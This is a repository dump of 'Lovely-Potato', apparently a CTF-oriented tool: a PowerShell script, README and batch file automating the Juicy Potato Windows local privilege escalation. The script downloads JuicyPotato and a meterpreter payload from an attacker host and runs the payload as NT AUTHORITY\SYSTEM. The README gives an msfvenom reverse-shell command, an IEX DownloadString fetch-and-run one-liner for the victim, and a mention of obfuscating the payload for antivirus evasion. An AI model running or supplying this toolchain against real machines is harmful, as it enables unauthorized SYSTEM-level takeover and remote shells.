Repository: TsukiCTF/Lovely-Potato Branch: master Commit: 3e54bf4397f1 Files: 3 Total size: 4.4 KB Directory structure: gitextract_zort7nat/ ├── Invoke-LovelyPotato.ps1 ├── README.md └── test_clsid.bat ================================================ FILE CONTENTS ================================================ ================================================ FILE: Invoke-LovelyPotato.ps1 ================================================ function Invoke-LovelyPotato { <# .SYNOPSIS Powershell script which automates the process of Juicy Potato local privilege escalation. .DESCRIPTION This script involves three major steps: 1. Downloads Juicy Potato static binary, CLSID enumeration script and an arbitrary binary which to be ran as NT AUTHORITY\SYSTEM. 2. Runs CLSID enumeration script in the background. 3. Launches Juicy Potato exploit for every CLSID with NT AUTHORITY\SYSTEM privilege found. .EXAMPLE PS > IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-LovelyPotato.ps1') .NOTES You must first read README.md and follow the instruction for initial setup or else this script will fail. .LINK https://github.com/TsukiCTF/Lovely-Potato #> # Configuration $RemoteDir = "http://10.10.10.10" $LocalPath = "c:\windows\system32\spool\drivers\color" # Download necessary files for exploitation (New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe") (New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat") (New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe") # Enumerate CLSIDs New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT $CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null} $CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath # Find System CLSIDs Start-Sleep -s 600 $SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]} # Launch Juicy Potato $SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"} } Invoke-LovelyPotato ================================================ FILE: README.md ================================================ # Lovely Potato (automating juicy potato) *Powershell wrapper of [Decoder's JuicyPotato][1] for easy exploitation. **This entirely depends on the [original Juicy Potato binary][2] and utilizes [his test_clsid.bat][3].*** TL;DR: SeImpersonatePrivilege Is Enabled = JuicyPotato Exploitable ## Quick Guide First clone this repo to your attacker machine which already has all of required dependencies: ``` root@attacker:~# git clone https://github.com/TsukiCTF/Lovely-Potato.git root@attacker:~# cd Lovely-Potato ``` Then modify the two following variables in 'Invoke-LovelyPotato.ps1' as below (attacker machine IP, writable path on the victim machine): ``` $RemoteDir = "http://[AttackerIP] $LocalPath = "[WritablePathOnVictimMachine]" ``` Now create a meterpreter binary on the attacker machine or use any other executable reverse shell: ``` root@attacker:~/Lovely-Potato# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[AttackerIP] LPORT=[AttackerPort] -f exe -o meterpreter.exe ``` Start a web server in this repo to serve your meterpreter.exe and other dependencies: ``` root@attacker:~/Lovely-Potato# python3 -m http.server 80 ``` On a new terminal, launch metasploit console (or any listener which handles whatever you are serving as a reverse shell): ``` root@attacker:~# msfdb run msf5 > # I'm going to omit setting up the multi handler as it is something you should already know ``` Finally enter below command on victim's powershell console and you **MUST WAIT 10 minutes** for reverse shell running as user NT AUTHORITY\SYSTEM! ``` PS > IEX(New-Object Net.WebClient).DownloadString('http://[AttackerIP]/Invoke-LovelyPotato.ps1') ``` ## Why Use Lovely Potato? *For simplicity.* Manually uploading various files to target host can be easily avoided with automation. Also, listing entire CLSIDs on the system and identifying privilege for each of them takes very long time if done by sending commands. You can easily switch binaries in the repo any time without having to recode Invoke-LovelyPotato.ps1. Ex) Recompiling JuicyPotato for customization / Obfuscating your meterpreter for AV evasion [1]: https://github.com/ohpe/juicy-potato [2]: https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts [3]: https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat ================================================ FILE: test_clsid.bat ================================================ @echo off :: Starting port, you can change it set /a port=10000 SETLOCAL ENABLEDELAYEDEXPANSION FOR /F %%i IN (CLSID.list) DO ( echo %%i !port! juicypotato.exe -z -l !port! -c %%i >> result.log set RET=!ERRORLEVEL! :: echo !RET! if "!RET!" == "1" set /a port=port+1 )